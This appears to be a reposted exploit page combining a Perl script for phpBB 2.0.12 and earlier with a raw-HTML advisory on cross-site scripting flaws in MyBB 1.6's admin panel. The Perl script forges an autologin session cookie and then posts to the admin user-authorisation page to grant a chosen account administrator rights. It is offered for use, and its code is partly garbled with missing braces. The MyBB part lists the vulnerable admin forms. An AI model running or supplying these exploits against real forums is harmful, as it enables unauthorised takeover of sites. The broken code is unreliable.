#!/usr/bin/perl -w
# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable
# More:
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this ;-)
# by Kutas,
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...
if (@ARGV < 3)
print q(
++++++++++++++++++++++++++++++++++++++++++++++++++ +Usage: perl [site] [phpbb folder] [username] [proxy (optional)]i.e. perl /forum/ BigAdmin ++
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];my $path = $ARGV[1];my $user = $ARGV[2];my $proxy = $ARGV[3];my $request = "http://";$request .= $host;$request .= $path;
use HTTP::Cookies;my $browser = LWP::UserAgent->new ();my $cookie_jar = HTTP::Cookies->new( );$browser->cookie_jar( $cookie_jar );$cookie_jar->set_cookie( "0", "phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1 %3Bs %3A6%3A". "%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/", $host, , , , ,);
if ( defined $proxy) {$proxy =~ s/(http://)//eg;$browser->proxy("http" , "http://$proxy");
print "++++++++++++++++++++++++++++++++++++\n";
print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}
my $response = $browser->get($request);
die "Error: ", $response->status_line
unless $response->is_success;
if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is vulnerable!!!\n";
} else {
print "Sorry... Not vulnerable"; exit();}
print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";$response->content =~ /sid=([wd]*)/;my $sid = $1;
$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";$response = $browser->post($request,
['username' => $user,'mode' => 'edit','mode' => 'user','submituser' => 'Look+up+User'],
die "Error: ", $response->status_line
unless $response->is_success;
if ($response->content =~ /name="u" value="([\d]*)"/)
{print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
else {print "No user $user found..."; exit(); }my $uid = $1;
print "Trying to give user:$user admin status...\n";
$response = $browser->post($request,
['userlevel' => 'admin','mode' => 'user','adv'=>'','u'=> $uid,'submit'=> 'Submit'],
die "Error: ", $response->status_line
unless $response->is_success;
print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>MYBB 1.6 (admin/index.php) XSS Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================MYBB 1.6 (admin/index.php) XSS Vulnerabilities==============================================1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
Name : MYBB 1.6 XSS Vulnerabilities in admin/index.php
Date : August, 15 2010
Vendor Url : : Sid3^effects aKa HaRi <shell_c99[at]>Big hugs : Th3 RDX
special thanks to : r0073r (,L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr
greetz to ,trent Dillman,All ICW members and my friends luv y0 guyz
Happy Independence day to all Pakistani and Indians #######################################################################################################MyBB contains a flaw that allows a remote cross site scripting attack. This flaw exists because it doesn’t
validate the inputs which are passed.Xploit: XSS Vulnerabilities
XSS Vulnerabilities are found in the following* Add New Forum* Create New Theme* Simile* Post Icons* custom profile###############################################################################################################DEMO URLs:
###############################################################################################################STEP :
* Login first* goto the options and insert the xss scripts and check the forum.###############################################################################################################
# 0day no more
# Sid3^effects
NB; Hanya sekedar berbagi ilmu semoga bermanfaat.
klu ada yg salah mohon disempurnakan....oke Trims.
